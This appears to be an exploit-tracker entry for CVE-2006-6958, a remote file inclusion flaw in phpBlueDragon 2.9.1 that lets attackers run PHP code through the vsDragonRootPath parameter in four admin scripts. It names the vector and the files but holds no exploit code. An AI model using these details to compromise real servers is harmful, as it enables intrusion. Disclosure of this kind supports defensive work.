CVE-2006-6958
phpBlueDragon 2.9.1 - Remote Code Execution via vsDragonRootPath Parameter
Title source: llmExploitation Summary
EIP tracks 1 public exploit for CVE-2006-6958. PoCs published by Shm.
AI-analyzed exploit summary This exploit demonstrates a remote file inclusion vulnerability in PHP Blue Dragon CMS by manipulating the 'vsDragonRootPath' parameter to include arbitrary remote files. The attack leverages unsanitized user input to execute malicious code in the context of the webserver process.
Description
Multiple PHP remote file inclusion vulnerabilities in phpBlueDragon 2.9.1 allow remote attackers to execute arbitrary PHP code via a URL in the vsDragonRootPath parameter to (1) team_admin.php, (2) rss_admin.php, (3) manual_admin.php, and (4) forum_admin.php in includes/root_modules/, a different set of vectors than CVE-2006-3076.
Exploits (1)
This exploit demonstrates a remote file inclusion vulnerability in PHP Blue Dragon CMS by manipulating the 'vsDragonRootPath' parameter to include arbitrary remote files. The attack leverages unsanitized user input to execute malicious code in the context of the webserver process.